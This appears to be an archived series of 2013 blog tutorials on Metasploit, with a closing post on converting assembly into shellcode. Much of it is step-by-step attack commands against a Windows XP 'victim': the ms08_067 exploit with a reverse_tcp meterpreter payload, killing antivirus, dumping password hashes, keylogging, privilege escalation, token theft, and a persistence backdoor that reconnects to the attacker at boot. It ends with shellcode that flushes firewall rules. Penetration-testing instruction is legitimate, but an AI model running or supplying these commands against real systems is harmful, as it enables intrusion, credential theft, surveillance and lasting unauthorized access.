11/16/2013

Metasploit 5

Metasploit 5


Meterpreter part 2


8- checkvm
To check if the remote system is a Vitrual machine

run checkvm

The target system is actually a virtual machine ruuning on VMware

9- killav
To kill antivirus

run killav


10- windows enumration
Collecting all information about the target machine such as (username , running process , tokens, network information , hardware information,groups, network route,firewall configuration,hash passwords, etc...)

run winenum


As mentioned the output is located in /root/.msf4/logs/scripts/winenum/BTRACK .....
To view the tokens



11- scraper
To collect information about the target machine such as (username , hash passwords, system info , etc...)

run scraper



12- persistence (backdoor)
Persistence is a backdoor allow you to connect back again anytime to the victim machine , because the user may patch the vulnerable services and you no longer can access to victim machine easily
so you have to install a backdoor on the victim machine to get access easily anytime

To list all options
persistence -h

-A Automatically start a machine multi/handler to connect to the agent
-L Location in target host where to write payload, if none %TEMP% will be used
-P Payload to use, default is windows/meterpreter/reverse_tcp
-S Automatically start the agent on boot as a service(with SYSTEM privileges)
-T Alternate executable templete to use
-U Automatically start the agent when the user logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

To install persistence backdoor on the victim machine

run persistence -X -i 40 -p 4445 -r 192.168.0.229



Now the backdoor is installed on the victim machine

Now we kill the session to see if the persistence can connect back to the local host (attacker)

To show all open sessions
session -l
suppose that the open session with the victim (192.168.0.227) is session 1
now let's kill session 1
session -k 1

Now we lost the connection with the victim machine

To connect back by using backdoor we must first run multi/handler to listen and wait for a reverse connection from backdoor

use exploit/multi/handler

Then let's set the local address and local port
set LHOST 192.168.0.229
set LPORT 4445
Then
exploit


And we have a meterpreter session again ...


9/11/2013

Metasploit 4

Metasploit 4


Meterpreter part 1

What is meterpreter ?

Meterpreter is payload that uses DLL injection technique in memory so ,
Antiviruses software can't detect it because meterpreter writes nothing to disk
Meterpreter uses encrypted communications.

Now let's try to hack windows machine (Windows XP) and set Meterpreter as a payload 


First we will use ms08_067_netapi exploit
use exploit/windows/smb/ms08_067_netapi


Then we set the remote host (victim)
set RHOST 192.168.0.227

Then we set meterpreter as a payload
set PAYLOAD windows/meterpreter/reverse_tcp


we set the IP address of the local machine (attacker) so that meterpreter can connect back to the attacker machine

set LHOST 192.168.0.229


Then ...

exploit



Excellent

The exploit (ms08_067_netapi) succeed and the remote machine (victim) connecting back to the local machine (attacker) 
Now we have a Meterpreter session open 

Let's explore some basic Meterpreter commands:

1- sysinfo
collect information about the system



2- screenshot
capturing the current desktop


3- hashdump
Dumping the password hash



Note: Meterpreter containe many of scripts such as (vnc, winenum , chrome_enum, killav ...)
To run a scripr run script_name for exmple(run chrome_enum) to capture chrome credentials
To list all meterpreter scripts jsu type run and hit tab twice


4- keystrokes
keystroke is Keyboard Capturing software, keystroke records the keys struck on a keyboard.


A- migrate to explorer
First we use ps command to view all process on the remote machine to get the PID of explorer process (explorer PID = 1432)
Then we do migration
what is migrate ?
To migrate meterpreter session from one process to another to avoid loosing the session if the process is killed

migrate 1432


B- run keylog_recorder


Note : the output file is located in "/root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt"

Now on windows try to type on keyboard
ping 192.168.0.229 then CTRL+C


C- To interrupt keystroker hit CTRL+C

now let's view the dumped file
cat /root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt


As expected

5-Privilege Escalation

To get system as admin user (Full access full privilege)

A- Load priv extension 
use priv

B- To get system as admin 
getsystem

C- To verify the admin privilege
getuid


6- VNC

VNC(Virtual Network Computing) is a remote control desktop software 

To install VNC on the remote machine
run vnc




To unlock the remote screen
run screen_unlock


7- Token impersonation

How to impersonate user tokens to allow you to access to system or network without having to provide credentials.

There are two types of tokens
1- delegate : For interactive logons suck as (remote desktop and machine logging)
2- impersonate : For non-interactive logons such as domain logon

To do so you have to load incognito extension

use incognito

Then to list the tokens available
list_tokens -u



To get the tokens of SYSTEM
impersonate_token "NT AUTHORITY\\SYSTEM"



Now we currently running as SYSTEM (Full access)


OR

use ps command to list all running processes , Then you can steal the token of the owner of any process

A- ps



Now if i want to run as Administrator (owner of the process wuauctl.exe) PID = 1528 OR for sure  any other process that owned by Administrator

B- steal_token 1528



8/01/2013

Metasploit 3

Metasploit 3



Advanced Commands 

Now we will introduce  some advanced commands in metasploit (msfconsole)

1- show exploits

msf> show exploits

Display all exploites available in metasploit


2- show auxiliary

msf> show auxiliary

Display all auxiliaries available in metasploit (scanners, fuzzers , DOS tools ... etc)




3- show options

msf> show options 

Display all the options available in specific exploit (for example ms03_026_dcom exploit)



4- show payloads

msf> show payloads

Display payloads that are related to the current module (ms03_026_dcom exploit)



5- show targets

msf> show targets

One exploit may targerting several versions of one OS , This option display the targets of this exploit (ms03_026_dcom exploit)



6- info

msf> info

Display all information about this module (exploit or auxiliary)

Exploit:


Auxiliaries:



7- set and unset

This command is use to enable on an option or to disable it

For example

To enable meterpreter reverse TCP payload for ms03_026_dcom exploit

msf> set PAYLOAD windows/meterpreter/reverse_tcp



To disable meterpreter reverse TCP payload ms03_026_dcom exploit

msf> unset PAYLOAD windows/meterpreter/reverse_tcp




7/24/2013

Metasploit 2


Metasploit 2


Scanning By Modules

Metasploit contains a lot of modules such as (port scanners , banner grabbers for services ... etc).
We will use here some of these modules

Note: to get port scanner modules msf>search portscan


1- TCP-SYN scanning

To make TCP-SYN port scan (syn)

To use a module use (use) command

msf>use auxiliary/scanner/portscan/syn

Then to adjust this modules use (show options) , you will see many options and you can set any variable you want by (set) command

For example to set IP address of the target address
set RHOST 192.168.0.1
set THREADS 100



To start execute the module use (run) command



2- SMB (server message block)

We use this scan to get Windows version (smb_version)

msf>use auxiliary/scanner/smb/smb_version




3- FTP scan 

To get FTP version or FTP banner (ftp_version)

msf>use auxiliary/scanner/ftp/ftp_version




To get tgat FTP alloow anonymous login (anonymous)

msf>use auxiliary/scanner/ftp/anonymous

4- SSH scan 

To get SSH version (ssh_version)

msf>use auxiliary/scanner/ssh/ssh_version




5- MS-SQL scan

MS-SQL uses static TCP port 1433 or it's use a dynamic porting so it's uses a query UDP port 1434
(ms-sql) module can do
A- Locate MS-SQL in a network
B- Get the instance name
C - Get porn number
D- Get the version of MS-SQL

msf>use auxiliary/scanner/mssql/mssql_ping

Note: For sure these modules can use for entire network
(set RHOST 192.168.0.0/24)

7/18/2013

Metasploit 1

Metasploit 1
Introduction 

Metasploit framework is a penetration testing framework that contain a lot of tools (port scanners , vulnerability scanners ...etc) .

Now we will start with the important step in penetration testing 

Information Gathering :
The first and the most imprtant step in penetration testing is information gathering , it is collecting as much information as possible about a target and your information must be accurate. Information gathering is 2 types 

1- Passive information Gathering
It's collecting information wthout touching the target like using

A- Google (or any other search engine)
B- whois
C- nslookup
D- netcraft

2- Active Information Gatherig
It's collecting information by touching the target like using (nmap).

NMAP:

some nmap options:

-oX ---> Export a report
-sI ---> Scan targets stealthy by spoofing ip address (Idle IP)
-A ----> Banner graabbing
-sS ---> Stealth TCP port scan
-Pn ---> Don't use ICMP (Don't ping)

Using nmap in Metasploit 

First you must connect to database (to dump results in it) 
by using command db_status and the result must be postgresql connected to msf3
Then use (db_nmap -A example.com)

msf > db_nmap -sS 127.0.0.1

[*] Nmap: Starting Nmap 6.25 ( http://nmap.org ) 
[*] Nmap: Nmap scan report for root (127.0.0.1)
[*] Nmap: Host is up (0.000012s latency).
[*] Nmap: Not shown: 994 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 22/tcp   open  ssh
[*] Nmap: 3001/tcp open  nessus
[*] Nmap: 5432/tcp open  postgresql
[*] Nmap: 5900/tcp open  vnc
[*] Nmap: 9050/tcp open  tor-socks
[*] Nmap: 9091/tcp open  xmltec-xmlmail
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 2.23 seconds

Note: Metasploit uses PostgreSQL database to store your results such as (nmap results nusses results ... )

To get the results in detail use hosts command

address        mac name os_name os_flavor  os_sp  purpose 
   -------          ---    ----      -------          ---------  -----  -------
127.0.0.1      00:22:68:31:93:b0      Unknown                          device
192.168.0.131  00:16:e6:64:5d:d1                  Unknown                              device
192.168.0.155 Microsoft Windows XP   SP2   client 

2/24/2013

Converting Binary to shellcode


Converting a Binary to shellcode


Now we will talk about converting a binary to shellcode
by using this program binary2shellcode (FOR LINUX AND UNIX)

1- Compile & Run :

To build binary2shellcode

    cd /Debuag
    sudo make
The program will be installed in /usr/bin/ and the app name bin2shell.
To test just run it (/usr/bin/bin2shell) and it should be like this

2- Use Binary2Shellcode :

We have here assembly code to flush iptables (iptables  -F) with 43 bytes size


xor       %eax,%eax
push     %eax
pushw  $0x462d
movl    %esp,%esi
pushl    %eax
pushl    $0x73656c62
pushl    $0x61747069
pushl    $0x2f6e6962
pushl    $0x732f2f2f
mov     %esp,%ebx
pushl    %eax
pushl    %esi
pushl    %ebx
movl     %esp,%ecx
mov      %eax,%edx
mov      $0xb,%al
int         $0x80

Let's compile and link and then try to run it



It's works fine

Now we have to convert the assembly code into shellcode so we can inject it as a payload by using Binary2Shellcode application

$bin2shell flush-iptables 


The shellcode is

\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6
\x50\x68\x62\x6c\x65\x73\x68\x69\x70
\x74\x61\x68\x62\x69\x6e\x2f\x68\x2f 
\x2f\x2f\x73\x89\xe3\x50\x56\x53\x89 
\xe1\x89\xc2\xb0\x0b\xcd\x80

Now let's try it in C code 



It's works fine too

Hint 1: Binary2Shell program is works only under Unix and Linux.
Hint 2: Binary2Shell is opensource  written in C under GNU General Public License.
Hint 3: Binary2Shell calculate the size of shellcode.
Hint 4: Binary2Shell Link https://github.com/Hamza-Megahed/binary2shellcode